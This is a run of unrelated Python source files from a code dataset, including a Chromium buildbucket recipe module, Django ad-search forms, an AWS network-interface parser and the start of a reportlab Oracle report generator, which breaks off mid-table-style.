self.build_url(build_id=build.id)\n\n def put(self, builds, **kwargs):\n \"\"\"Puts a batch of builds.\n\n DEPRECATED. Use `schedule()` instead.\n\n Args:\n * builds (list): A list of dicts, where keys are:\n * 'bucket': (required) name of the bucket for the request.\n * 'parameters' (dict): (required) arbitrary json-able parameters that a\n build system would be able to interpret.\n * 'experimental': (optional) a bool indicating whether build is\n experimental. If not provided, the value will be determined by whether\n the currently running build is experimental.\n * 'tags': (optional) a dict(str->str) of tags for the build. These will\n be added to those generated by this method and override them if\n appropriate. If you need to remove a tag set by default, set its value\n to `None` (for example, `tags={'buildset': None}` will ensure build is\n triggered without `buildset` tag).\n\n Returns:\n A step that as its `.stdout` property contains the response object as\n returned by buildbucket.\n \"\"\"\n build_specs = []\n for build in builds:\n build_specs.append(self.m.json.dumps({\n 'bucket': build['bucket'],\n 'parameters_json': self.m.json.dumps(build['parameters']),\n 'tags': self._tags_for_build(build['bucket'], build['parameters'],\n build.get('tags')),\n 'experimental': build.get('experimental',\n self.m.runtime.is_experimental),\n }))\n return self._run_buildbucket('put', build_specs, **kwargs)\n\n def search(self, predicate, limit=None, url_title_fn=None, step_name=None):\n \"\"\"Searches for builds.\n\n Example: find all builds of the current CL.\n\n ```python\n from PB.go.chromium.org.luci.buildbucket.proto import rpc as rpc_pb2\n\n related_builds = api.buildbucket.search(rpc_pb2.BuildPredicate(\n gerrit_changes=list(api.buildbucket.build.input.gerrit_changes),\n ))\n ```\n\n Args:\n * predicate: a `rpc_pb2.BuildPredicate` object or a list thereof.\n If a list, the predicates are connected with logical OR.\n * limit: max number of builds to return. Defaults to 1000.\n * url_title_fn: generates a build URL title. See module docstring.\n\n Returns:\n A list of builds ordered newest-to-oldest.\n \"\"\"\n assert isinstance(predicate, (list, rpc_pb2.BuildPredicate)), predicate\n if not isinstance(predicate, list):\n predicate = [predicate]\n assert all(isinstance(p, rpc_pb2.BuildPredicate) for p in predicate)\n assert isinstance(limit, (type(None), int))\n assert limit is None or limit >= 0\n\n limit = limit or 1000\n\n batch_req = rpc_pb2.BatchRequest(\n requests=[\n dict(search_builds=dict(\n predicate=p,\n page_size=limit,\n fields=self._default_field_mask('builds.*.'),\n ))\n for p in predicate\n ],\n )\n step_res, batch_res, has_errors = self._batch_request(\n step_name or 'buildbucket.search',\n batch_req,\n rpc_pb2.BatchResponse())\n if has_errors:\n raise self.m.step.InfraFailure('Build search failed')\n\n # Union build results.\n builds = {}\n for r in batch_res.responses:\n for b in r.search_builds.builds:\n if b.id not in builds:\n builds[b.id] = b\n\n # Order newest-to-oldest. Then cut using the limit.\n ret = [b for _, b in sorted(builds.iteritems())][:limit]\n for b in ret:\n self._report_build_maybe(step_res, b, url_title_fn=url_title_fn)\n return ret\n\n def cancel_build(self, build_id, **kwargs):\n return self._run_buildbucket('cancel', [build_id], **kwargs)\n\n def get_multi(self, build_ids, url_title_fn=None, step_name=None):\n \"\"\"Gets multiple builds.\n\n Args:\n * `build_ids`: a list of build IDs.\n * `url_title_fn`: generates build URL title. See module docstring.\n * `step_name`: name for this step.\n\n Returns:\n A dict {build_id: build_pb2.Build}.\n \"\"\"\n return self._get_multi(build_ids, url_title_fn, step_name)[1]\n\n def _get_multi(self, build_ids, url_title_fn, step_name):\n \"\"\"Implements get_multi, but also returns StepResult.\"\"\"\n batch_req = rpc_pb2.BatchRequest(\n requests=[\n dict(get_build=dict(id=id, fields=self._default_field_mask()))\n for id in build_ids\n ],\n )\n test_res = rpc_pb2.BatchResponse(\n responses=[\n dict(get_build=dict(id=id, status=common_pb2.SUCCESS))\n for id in build_ids\n ]\n )\n step_res, batch_res, has_errors = self._batch_request(\n step_name or 'buildbucket.get_multi', batch_req, test_res)\n ret = {}\n for res in batch_res.responses:\n if res.HasField('get_build'):\n b = res.get_build\n self._report_build_maybe(step_res, b, url_title_fn=url_title_fn)\n ret[b.id] = b\n if has_errors:\n raise self.m.step.InfraFailure('Getting builds failed')\n return step_res, ret\n\n def get(self, build_id, url_title_fn=None, step_name=None):\n \"\"\"Gets a build.\n\n Args:\n * `build_id`: a buildbucket build ID.\n * `url_title_fn`: generates build URL title. See module docstring.\n * `step_name`: name for this step.\n\n Returns:\n A build_pb2.Build.\n \"\"\"\n builds = self.get_multi(\n [build_id],\n url_title_fn=url_title_fn,\n step_name=step_name or 'buildbucket.get')\n return builds[build_id]\n\n def get_build(self, build_id, **kwargs):\n \"\"\"DEPRECATED. Use get().\"\"\"\n return self._run_buildbucket('get', [build_id], **kwargs)\n\n def collect_build(self, build_id, **kwargs):\n \"\"\"Shorthand for `collect_builds` below, but for a single build only.\n\n Args:\n * build_id: Integer ID of the build to wait for.\n\n Returns:\n [Build](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto).\n for the ended build.\n \"\"\"\n assert isinstance(build_id, int)\n return self.collect_builds([build_id], **kwargs)[build_id]\n\n def collect_builds(\n self, build_ids, interval=None, timeout=None, step_name=None,\n raise_if_unsuccessful=False, url_title_fn=None,\n mirror_status=False,\n ):\n \"\"\"Waits for a set of builds to end and returns their details.\n\n Args:\n * `build_ids`: List of build IDs to wait for.\n * `interval`: Delay (in secs) between requests while waiting for build to end.\n Defaults to 1m.\n * `timeout`: Maximum time to wait for builds to end. Defaults to 1h.\n * `step_name`: Custom name for the generated step.\n * `raise_if_unsuccessful`: if any build being collected did not succeed, raise\n an exception.\n * `url_title_fn`: generates build URL title. See module docstring.\n * `mirror_status`: mark the step as failed/infra-failed if any of the builds\n did not succeed. Ignored if raise_if_unsuccessful is True.\n\n Returns:\n A map from integer build IDs to the corresponding\n [Build](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto)\n for all specified builds.\n \"\"\"\n if not build_ids:\n return {}\n interval = interval or 60\n timeout = timeout or 3600\n\n with self.m.step.nest(step_name or 'buildbucket.collect'):\n # Wait for the builds to finish.\n self._run_bb(\n step_name='wait',\n subcommand='collect',\n args=['-interval', '%ds' % interval] + build_ids,\n )\n\n # Fetch build details.\n step_res, builds = self._get_multi(\n build_ids, url_title_fn=url_title_fn, step_name='get')\n\n if raise_if_unsuccessful:\n unsuccessful_builds = sorted(\n b.id for b in builds.itervalues()\n if b.status != common_pb2.SUCCESS\n )\n if unsuccessful_builds:\n step_res.presentation.status = self.m.step.FAILURE\n step_res.presentation.logs['unsuccessful_builds'] = map(\n str, unsuccessful_builds)\n raise self.m.step.InfraFailure(\n 'Triggered build(s) did not succeed, unexpectedly')\n elif mirror_status:\n bs = builds.values()\n if any(b.status == common_pb2.INFRA_FAILURE for b in bs):\n step_res.presentation.status = self.m.step.EXCEPTION\n elif any(b.status == common_pb2.FAILURE for b in bs):\n step_res.presentation.status = self.m.step.FAILURE\n\n return builds\n\n # Internal.\n\n def _batch_request(self, step_name, request, test_response):\n \"\"\"Makes a Builds.Batch request.\n\n Returns (StepResult, rpc_pb2.BatchResponse, has_errors) tuple.\n \"\"\"\n request_dict = json_format.MessageToDict(request)\n try:\n self._run_bb(\n step_name=step_name,\n subcommand='batch',\n stdin=self.m.json.input(request_dict),\n stdout=self.m.json.output(),\n step_test_data=lambda: self.m.json.test_api.output_stream(\n json_format.MessageToDict(test_response)\n ),\n )\n except self.m.step.StepFailure: # pragma: no cover\n # Ignore the exit code and parse the response as BatchResponse.\n # Fail if parsing fails.\n pass\n\n step_res = self.m.step.active_result\n\n # Log the request.\n step_res.presentation.logs['request'] = json.dumps(\n request_dict, indent=2, sort_keys=True).splitlines()\n\n # Parse the response.\n batch_res = rpc_pb2.BatchResponse()\n json_format.ParseDict(\n step_res.stdout, batch_res,\n # Do not fail the build because recipe's proto copy is stale.\n ignore_unknown_fields=True)\n\n # Print response errors in step text.\n step_text = []\n has_errors = False\n for i, r in enumerate(batch_res.responses):\n if r.HasField('error'):\n has_errors = True\n step_text.extend([\n 'Request #%d' % i,\n 'Status code: %s' % r.error.code,\n 'Message: %s' % r.error.message,\n '', # Blank line.\n ])\n step_res.presentation.step_text = '
    '.join(step_text)\n\n return (step_res, batch_res, has_errors)\n\n def _run_bb(\n self, subcommand, step_name=None, args=None, stdin=None, stdout=None,\n step_test_data=None):\n cmdline = [\n 'bb', subcommand,\n '-host', self._host,\n ]\n # Do not pass -service-account-json. It is not needed on LUCI.\n # TODO(nodir): change api.runtime.is_luci default to True and assert\n # it is true here.\n cmdline += args or []\n\n return self.m.step(\n step_name or ('bb ' + subcommand),\n cmdline,\n infra_step=True,\n stdin=stdin,\n stdout=stdout,\n step_test_data=step_test_data,\n )\n\n # TODO(nodir): remove in favor of _run_bb\n def _run_buildbucket(\n self, subcommand, args=None, json_stdout=True, name=None, **kwargs):\n step_name = name or ('buildbucket.' + subcommand)\n\n args = args or []\n if self._service_account_key:\n args = ['-service-account-json', self._service_account_key] + args\n args = ['buildbucket', subcommand, '-host', self._host] + args\n\n kwargs.setdefault('infra_step', True)\n stdout = self.m.json.output() if json_stdout else None\n return self.m.step(step_name, args, stdout=stdout, **kwargs)\n\n def _tags_for_build(self, bucket, parameters, override_tags=None):\n new_tags = self.tags_for_child_build\n builder_name = parameters.get('builder_name')\n if builder_name:\n new_tags['builder'] = builder_name\n # TODO(tandrii): remove this Buildbot-specific code.\n if bucket.startswith('master.'):\n new_tags['master'] = bucket[7:]\n new_tags.update(override_tags or {})\n return sorted(\n '%s:%s' % (k, v)\n for k, v in new_tags.iteritems()\n if v is not None)\n\n @property\n def bucket_v1(self):\n \"\"\"Returns bucket name in v1 format.\n\n Mostly useful for scheduling new builds using V1 API.\n \"\"\"\n return self._bucket_v1\n\n\n # DEPRECATED API.\n\n @property\n def properties(self): # pragma: no cover\n \"\"\"DEPRECATED, use build attribute instead.\"\"\"\n return self._legacy_property\n\n @property\n def build_id(self): # pragma: no cover\n \"\"\"DEPRECATED, use build.id instead.\"\"\"\n return self.build.id or None\n\n @property\n def build_input(self): # pragma: no cover\n \"\"\"DEPRECATED, use build.input instead.\"\"\"\n return self.build.input\n\n @property\n def builder_id(self): # pragma: no cover\n \"\"\"Deprecated. Use build.builder instead.\"\"\"\n return self.build.builder\n\n\n# Legacy support.\n\n\ndef _legacy_tags(build_dict, build_msg):\n for t in build_dict.get('tags', []):\n k, v = t.split(':', 1)\n if k =='buildset' and v.startswith(('patch/gerrit/', 'commit/gitiles')):\n continue\n if k in ('build_address', 'builder'):\n continue\n build_msg.tags.add(key=k, value=v)\n\n\ndef _legacy_input_gerrit_changes(\n dest_repeated, build_sets,\n patch_storage, patch_gerrit_url, patch_project, patch_issue, patch_set):\n if patch_storage == 'gerrit' and patch_project:\n host, path = util.parse_http_host_and_path(patch_gerrit_url)\n if host and (not path or path == '/'):\n try:\n patch_issue = int(patch_issue or 0)\n patch_set = int(patch_set or 0)\n except ValueError:\n pass\n else:\n if patch_issue and patch_set:\n dest_repeated.add(\n host=host,\n project=patch_project,\n change=patch_issue,\n patchset=patch_set)\n return\n\n for bs in build_sets:\n if isinstance(bs, common_pb2.GerritChange):\n dest_repeated.add().CopyFrom(bs)\n\n\ndef _legacy_input_gitiles_commit(\n dest, build_dict, build_sets, revision, branch):\n commit = None\n for bs in build_sets:\n if isinstance(bs, common_pb2.GitilesCommit):\n commit = bs\n break\n if commit:\n dest.CopyFrom(commit)\n\n ref_prefix = 'gitiles_ref:'\n for t in build_dict.get('tags', []):\n if t.startswith(ref_prefix):\n dest.ref = t[len(ref_prefix):]\n break\n\n return\n\n if util.is_sha1_hex(revision):\n dest.id = revision\n if branch:\n dest.ref = 'refs/heads/%s' % branch\n\n\ndef _legacy_builder_id(build_dict, mastername, buildername, builder_id):\n builder_id.project = build_dict.get('project') or ''\n builder_id.bucket = build_dict.get('bucket') or ''\n\n if builder_id.bucket:\n luci_prefix = 'luci.%s.' % builder_id.project\n if builder_id.bucket.startswith(luci_prefix):\n builder_id.bucket = builder_id.bucket[len(luci_prefix):]\n if not builder_id.bucket and mastername:\n builder_id.bucket = 'master.%s' % mastername\n\n tags_dict = dict(t.split(':', 1) for t in build_dict.get('tags', []))\n builder_id.builder = tags_dict.get('builder') or buildername or ''\n\n","sub_path":"recipe_modules/buildbucket/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":33308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102976564","text":"import importlib\nimport logging\nimport pkgutil\nimport types\n\nimport funcy\n\nfrom fhub_core.feature import Feature\n\n__all__ = [\n 'get_contrib_features',\n]\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_contrib_features(contrib):\n '''Get contributed features from within given module\n\n Be very careful with untrusted code. The module/package will be\n walked, every submodule will be imported, and all the code therein will be\n executed. But why would you be trying to import from an untrusted package\n anyway?\n\n Args:\n contrib (module): module (standalone or package) that contains feature\n definitions\n\n Returns:\n List of Feature\n '''\n\n if isinstance(contrib, types.ModuleType):\n contrib_features = []\n\n # fuuuuu\n importlib.invalidate_caches()\n\n # any module that has a __path__ attribute is a package\n if hasattr(contrib, '__path__'):\n features = get_contrib_features_from_package(contrib)\n contrib_features.extend(features)\n else:\n features = get_contrib_features_from_module(contrib)\n contrib_features.extend(features)\n return contrib_features\n else:\n raise ValueError('Input is not a module')\n\n\ndef get_contrib_features_from_package(package):\n contrib_features = []\n\n logger.debug(\n 'Walking package path {path} to detect modules...'\n .format(path=package.__path__))\n for importer, modname, _ in pkgutil.walk_packages(\n path=package.__path__,\n prefix=package.__name__ + '.',\n onerror=logger.error):\n try:\n mod = importer.find_module(modname).load_module(modname)\n except ImportError:\n logger.exception(\n 'Failed to import module {modname}'\n .format(modname=modname))\n continue\n features = get_contrib_features_from_module(mod)\n contrib_features.extend(features)\n\n return contrib_features\n\n\ndef get_contrib_features_from_module(mod):\n contrib_features = []\n\n logger.debug(\n 'Trying to import contributed feature(s) from module {modname}...'\n .format(modname=mod.__name__))\n\n # case 1: file defines `features` variable\n try:\n features = import_contrib_feature_from_collection(mod)\n contrib_features.extend(features)\n logger.debug(\n 'Imported {n} feature(s) from {modname} from collection'\n .format(n=len(features), modname=mod.__name__))\n except ImportError:\n # case 2: file has at least `input` and `transformer` defined\n try:\n feature = import_contrib_feature_from_components(mod)\n contrib_features.append(feature)\n logger.debug(\n 'Imported 1 feature from {modname} from components'\n .format(modname=mod.__name__))\n except ImportError:\n # case 3: nothing useful in file\n logger.debug(\n 'Failed to import anything useful from module {modname}'\n .format(modname=mod.__name__))\n\n return contrib_features\n\n\ndef import_contrib_feature_from_components(mod):\n required = ['input', 'transformer']\n optional = ['name', 'description', 'output', 'options']\n required_vars, optional_vars = import_names_from_module(\n mod, required, optional)\n feature = Feature(\n input=required_vars['input'],\n transformer=required_vars['transformer'],\n source=mod.__name__,\n **optional_vars)\n return feature\n\n\ndef import_contrib_feature_from_collection(mod):\n required = 'features'\n optional = None\n required_vars, _ = import_names_from_module(\n mod, required, optional)\n features = required_vars['features']\n for feature in features:\n feature.source = mod.__name__\n return features\n\n\ndef import_names_from_module(mod, required, optional):\n\n msg = funcy.partial(\n 'Required variable {varname} not found in module {modname}'\n .format, modname=mod.__name__)\n\n # required vars\n if required:\n required_vars = {}\n if isinstance(required, str):\n required = [required]\n for varname in required:\n if hasattr(mod, varname):\n required_vars[varname] = getattr(mod, varname)\n else:\n raise ImportError(msg(varname=varname))\n else:\n required_vars = None\n\n # optional vars\n if optional:\n if isinstance(optional, str):\n optional = [optional]\n optional_vars = {k: getattr(mod, k)\n for k in optional if hasattr(mod, k)}\n else:\n optional_vars = None\n\n return required_vars, optional_vars\n","sub_path":"fhub_core/contrib.py","file_name":"contrib.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"311648445","text":"import ConfigParser\n\n\nclass ConfigInitializer:\n def createConfig(self, file, min_edge, max_edge, bin_size, first_bin, overbookingfactor):\n config = ConfigParser.ConfigParser()\n config.add_section('bins')\n config.set('bins', 'min_edge', min_edge)\n config.set('bins', 'max_edge', max_edge)\n config.set('bins', 'bin_size', bin_size)\n config.set('bins', 'first_bin', first_bin)\n\n config.add_section('overbookingfactor')\n config.set('overbookingfactor', 'x', overbookingfactor)\n\n configfile = open(file, 'w')\n config.write(configfile)\n","sub_path":"Allocation_optimizer/Updated_sourcecode/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"558149310","text":"# -*- coding: utf-8 -*-\n\n'''\nНапишите функцию, которая будет принимать список\nцифр и проверять, встречается ли заданная цифра\nуказанное число раз подряд. Функция должна возвращать\nTrue или False. Исходим из того, что все параметры\nвсегда будут валидными.\n\nШаблон:\n\nis_there_consecutive([lst], n, times)\n\n- [lst] — список может быть любой длины, цифры идут в произвольном порядке\n- n — цифра, которую нужно проверять\n- times — сколько раз подряд должна встретиться цифра n\n\nПримеры:\n\nis_there_consecutive([1, 3, 5, 5, 3, 3, 1], 3, 2) True\nis_there_consecutive([1, 2, 3, 4, 5], 1, 1) True\nis_there_consecutive([3], 1, 0) True\nis_there_consecutive([2, 2, 3, 2, 2, 2, 2, 3, 4, 1, 5], 3, 2) False\nis_there_consecutive([5, 5, 5, 5, 5], 5, 7) False\n'''\n\nfrom typing import List\n\ndef is_there_consecutive(arr: List[int], nbr: int, times: int) -> bool:\n '''Определяет встречаетлся ли число nbr в списке arr times раз подряд.'''\n # Проверяет есть ли строка состоящая из числа nbr повторённого times раз\n # в строке созданной из списка arr.\n return str(nbr) * times in ''.join(map(str, arr))\n\n\n\ntests = ((([1, 3, 5, 5, 3, 3, 1], 3, 2), True),\n (([1, 2, 3, 4, 5], 1, 1), True),\n (([3], 1, 0), True),\n (([2, 2, 3, 2, 2, 2, 2, 3, 4, 1, 5], 3, 2), False),\n (([5, 5, 5, 5, 5], 5, 7), False))\n\nfor args, check in tests:\n print(is_there_consecutive(*args) == check)\n\n","sub_path":"easy/is_there_consecutive.py","file_name":"is_there_consecutive.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"97959145","text":"from nightowl.models.nom import NetworkIPv4Address\nfrom nightowl.plugins.parser.aws.base import AWSPropertyParserBase\nfrom nightowl.utils.aws import get_name\n\n\nclass ParserPlugin(AWSPropertyParserBase):\n\n def execute(self):\n network_object = self.network_object\n network_object.noid = self.resource.attachment['InstanceId']\n network_object.name = get_name(self.resource.tag_set, self.resource.id)\n network_object.aws_tags = [\n {'key': tag['Key'], 'value': tag['Value']} for tag in self.resource.tag_set]\n private_ip_address = self.resource.private_ip_address\n cidr_block = self.resource.subnet.cidr_block\n prefix_len = int(cidr_block.split('/')[1])\n network_object.ipv4_addrs = [NetworkIPv4Address(\n addr=private_ip_address,\n prefix_len=prefix_len,\n subnet=cidr_block,\n )]\n return network_object\n","sub_path":"nightowl/plugins/parser/aws/network_interface.py","file_name":"network_interface.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593704642","text":"#-*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.contrib.gis.geos import Point\nfrom django.conf import settings\n\nfrom pygeocoder import Geocoder, GeocoderError\n\nfrom geoads.models import AdPicture, AdContact, AdSearch, AdSearchResult, Ad\nfrom geoads.widgets import ImageWidget\nfrom geoads.utils import geocode\n\n\nclass AdPictureForm(ModelForm):\n \"\"\"\n Ad picture form\n Warning: just used for class based views in this app\n Applications could/should make it more pretty\n\n \"\"\"\n image = forms.ImageField(widget=ImageWidget(), required=False)\n\n class Meta:\n model = AdPicture\n\n\nclass AdContactForm(ModelForm):\n \"\"\"\n Ad contact form\n\n \"\"\"\n class Meta:\n model = AdContact\n exclude = ['user', 'content_type', 'object_pk']\n\n\nclass AdSearchForm(ModelForm):\n \"\"\"\n Ad search form\n\n \"\"\"\n class Meta:\n model = AdSearch\n fields = ('search', )\n widgets = {\n 'search': forms.HiddenInput\n }\n\n\nclass AdSearchResultContactForm(ModelForm):\n \"\"\"\n Ad Search Result Contact Form\n\n \"\"\"\n message = forms.CharField(\n widget=forms.Textarea(attrs={'rows': 4}), required=False\n )\n\n class Meta:\n model = AdSearchResult\n fields = ('message', 'id')\n exclude = ('ad_search', 'content_type',\n 'object_pk', 'create_date', 'contacted')\n\n\nclass AdSearchUpdateForm(ModelForm):\n \"\"\"\n Ad search form for update\n\n \"\"\"\n class Meta:\n model = AdSearch\n fields = ('public', 'description')\n\n\nclass BaseAdForm(ModelForm):\n \"\"\"\n Base ad form\n Use it with your own Ad instance\n\n \"\"\"\n def clean_user_entered_address(self):\n # here we try to figure if user entered address\n # is an existing address\n # ! of course, this will be needed an other time\n # to set address and location fields in ad model\n # don't know how to improve this for the moment\n # and just have it computed one time\n data = self.cleaned_data['user_entered_address']\n if settings.BYPASS_GEOCODE == True:\n if data == 'fkjfkjfkjfkj': # hook to not use BYPASS_GEOCODE\n raise forms.ValidationError(u\"Indiquer une adresse valide.\")\n return data\n else:\n try:\n geocode(data.encode('ascii', 'ignore'))\n except: # TODO: create GeocodeError\n raise forms.ValidationError(u\"Indiquer une adresse valide.\")\n return data\n\n class Meta:\n model = Ad\n exclude = ('user', 'delete_date', 'location', 'address')\n","sub_path":"geoads/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"439099449","text":"# -*- coding:utf-8 -*-\n'''\n@project: '__dbreport__.py'\n@modules: report.oraclerpt\n@description:\n\n@author: abelit\n@email: ychenid@live.com\n@created:Mar 5, 2018\n\n@licence: GPL\n'''\n\n__version__ = '''$Id$'''\n# from reportlab.lib.testutils import outputfile,setOutDir\n# setOutDir(__name__)\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch, cm\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.platypus.frames import Frame\nfrom reportlab.platypus.paragraph import Paragraph\nfrom reportlab.platypus.flowables import Spacer, Preformatted\nfrom reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate, NextPageTemplate\nfrom reportlab.platypus import tableofcontents, PageBreak\nfrom reportlab.lib.enums import TA_CENTER, TA_LEFT\nfrom reportlab.platypus import Table, TableStyle\nfrom reportlab.lib import colors\nfrom reportlab.graphics import shapes\nfrom reportlab.graphics.widgets import signsandsymbols\n# 导入生产条形码的工具包\nfrom reportlab.graphics.barcode import eanbc, qr\nfrom reportlab.graphics.shapes import Drawing, Image, Rect\nfrom reportlab.graphics import renderPDF\n\n# 导入注册字体的模块\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase.cidfonts import UnicodeCIDFont\nfrom reportlab.platypus import Image as platImage\n\nfrom math import sqrt\nimport datetime, calendar, time\nimport random\nimport io\n\n# 导入画图模块\nimport matplotlib.pyplot as plt\n# import matplotlib.dates as mdates\n\n# 导入自定义模块\n# 导入数据库信息提取模块\nfrom report.database import Oracle\n# 导入系统获取操作系统信息模块\nfrom report.host import HostMetric\nfrom config import settings\n\n# 注册字体\npdfmetrics.registerFont(UnicodeCIDFont('STSong-Light'))\npdfmetrics.registerFont(TTFont('msyh', settings.path_settings['font'] + 'msyh.ttf'))\n\n\nmyFontName = 'msyh'\n\nclass BarCodes:\n barcode_value = ''\n for i in range(10):\n barcode_value = barcode_value + str(random.randint(0, 9))\n\n def genEan13Barcode(self, canvas, x, y, width=50, height=10, barcode_value=barcode_value):\n # draw the eanbc13 code\n barcode_eanbc13 = eanbc.Ean13BarcodeWidget(barcode_value)\n d = Drawing(width=width, height=height)\n d.add(barcode_eanbc13)\n renderPDF.draw(d, canvas, x, y)\n\n def genEan8Barcode(self, canvas, x, y, width, height, barcode_value=\"1234567890\"):\n # draw the eanbc8 code\n barcode_eanbc8 = eanbc.Ean8BarcodeWidget(self.barcode_value)\n d = Drawing(width=width, height=height)\n d.add(barcode_eanbc8)\n renderPDF.draw(d, canvas, x, y)\n\n def genQrCode(self, canvas, x, y, width, height, qr_value='http://www.dataforum.org'):\n # draw a QR code\n qr_code = qr.QrCodeWidget(qr_value)\n bounds = qr_code.getBounds()\n width = bounds[2] - bounds[0]\n height = bounds[3] - bounds[1]\n d = Drawing(width, height, transform=[45. / width, 0, 0, 45. / height, 0, 0])\n d.add(qr_code)\n renderPDF.draw(d, canvas, x, y)\n\n\nclass DrawShape:\n def drawArrow(self, xdraw, ydraw, size, rotate, x, y, color):\n # drawArrow(10,20,20,90,0,-15,colors.green)\n # drawArrow(10,20,20,-90,-20,-5,colors.red)\n # 画绿色向上箭头\n d = shapes.Drawing(xdraw, ydraw)\n ao = signsandsymbols.ArrowOne()\n ao.fillColor = color\n ao.size = size\n d.rotate(rotate)\n ao.x, ao.y = x, y\n d.add(ao)\n\n return d\n\n def drawAlert(self, xdraw, ydraw, size, x, y, strokewidth, color):\n # drawAlert(20,20,20,0,0,4,colors.red)\n # drawAlert(20,20,20,0,0,0,colors.green)\n # 画告警图\n d = Drawing(xdraw, ydraw)\n ds = signsandsymbols.DangerSign()\n ds.x, ds.y = x, y\n ds.size = size\n ds.strokeWidth = strokewidth\n ds.fillColor = color\n d.add(ds)\n\n return d\n\n def drawSmile(self, xdraw, ydraw, size, x, y):\n # drawSmile(20,20,20,0,0)\n d = Drawing(xdraw, ydraw)\n ds = signsandsymbols.SmileyFace()\n ds.x, ds.y = x, y\n ds.size = size\n d.add(ds)\n\n return d\n\n def drawCrossbox(self, xdraw, ydraw, size, x, y, crosscolor, fillcolor):\n # drawCrossbox(20,20,20,0,0,colors.red,colors.white)\n # drawCrossbox(20,20,20,0,0,colors.green,colors.green)\n # 画Xbox信息\n d = Drawing(xdraw, ydraw)\n ds = signsandsymbols.Crossbox()\n ds.x, ds.y = x, y\n ds.size = size\n ds.crosswidth = 3\n ds.crossColor = crosscolor\n ds.fillColor = fillcolor\n d.add(ds)\n\n return d\n\n def drawBattery(self, xdraw, ydraw, pct, pctcolor):\n # drawBattery(25,20,5,colors.green)\n # 画使用率图\n d = Drawing(xdraw, ydraw)\n r = Rect(0, 0, 25 * pct, ydraw)\n r.fillColor = pctcolor\n r.strokeColor = colors.green\n r.strokeWidth = 0\n\n s = Rect(0, 0, xdraw, ydraw)\n s.fillColor = colors.white\n s.strokeColor = colors.green\n d.add(s)\n d.add(r)\n\n return d\n\ndef plot_curve(x, y, title, xlabel, ylabel):\n plt.figure(figsize=(20, 5))\n# xs = [datetime.datetime.strptime(d, '%Y-%m-%d').date() for d in x]\n# plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m-%d'))\n# plt.gca().xaxis.set_major_locator(mdates.DayLocator())\n\n plt.title(title)\n plt.plot(x, y, 'o-')\n plt.gcf().autofmt_xdate() # 自动旋转日期标记\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n# plt.show()\n imgdata = io.BytesIO()\n plt.savefig(imgdata, format='png')\n imgdata.seek(0) # rewind the data\n\n img = platImage(imgdata, 600, 180)\n\n return img\n\n\n#\ndef makeHeaderStyle(level, fontName=myFontName):\n \"Make a header style for different levels.\"\n\n assert level >= 0, \"Level must be >= 0.\"\n\n PS = ParagraphStyle\n size = 24.0 / sqrt(1 + level)\n style = PS(name='Heading' + str(level),\n fontName=fontName,\n fontSize=size,\n leading=size * 1.2,\n spaceBefore=size / 4.0,\n spaceAfter=size / 8.0)\n return style\n\n\ndef makeBodyStyle(fontName=myFontName, firstLineIndent=20):\n \"Body text style - the default will do\"\n# return ParagraphStyle('body')\n styleSheet = getSampleStyleSheet()\n myBodyStyle = styleSheet['BodyText']\n myBodyStyle.fontName = fontName\n myBodyStyle.leading = 14\n myBodyStyle.firstLineIndent = firstLineIndent\n myBodyStyle.wordWrap = 'CJK'\n\n return myBodyStyle\n\n\ndef makeTitleStyle(fontSize=18, fontName=myFontName):\n \"Title text style - the default will do\"\n# return ParagraphStyle('body')\n styleSheet = getSampleStyleSheet()\n myTitleStyle = styleSheet['Title']\n myTitleStyle.fontName = fontName\n myTitleStyle.fontSize = fontSize\n\n return myTitleStyle\n\ndef makeListTitleStyle(fontSize=18, fontName=myFontName):\n \"Title text style - the default will do\"\n styleSheet = getSampleStyleSheet()\n myTitleStyle = styleSheet['Title']\n myTitleStyle.alignment = TA_LEFT\n myTitleStyle.fontName = fontName\n myTitleStyle.fontSize = fontSize\n\n return myTitleStyle\n\ndef makeTocHeaderStyle(level, delta, epsilon, fontName=myFontName):\n \"Make a header style for different levels.\"\n\n assert level >= 0, \"Level must be >= 0.\"\n\n PS = ParagraphStyle\n size = 12\n style = PS(name='Heading' + str(level),\n fontName=fontName,\n fontSize=size,\n leading=size * 1.2,\n spaceBefore=size / 4.0,\n spaceAfter=size / 8.0,\n firstLineIndent=-epsilon,\n leftIndent=level * delta + epsilon)\n\n return style\n\ndef makeTableTitleStyle(fontSize=12, fontName=myFontName):\n styleSheet = getSampleStyleSheet()\n myTitleStyle = styleSheet['BodyText']\n myTitleStyle.alignment = TA_CENTER\n myTitleStyle.leading = 18\n myTitleStyle.fontName = fontName\n myTitleStyle.fontSize = fontSize\n\n return myTitleStyle\n\ndef makeTable(data, title=None, note=None, colwidth=None):\n lst = []\n\n# if colwidth is not None:\n# cw = list(colwidth)\n# for i in range(len(cw)-1):\n# cw[i] = cw[i] * tablewidth\n# colwidth = tuple(cw)\n t = Table(data, colWidths=colwidth)\n ts = TableStyle(\n [('LINEABOVE', (0, 0), (-1, 0), 2, colors.green),\n ('LINEABOVE', (0, 1), (-1, -1), 0.25, 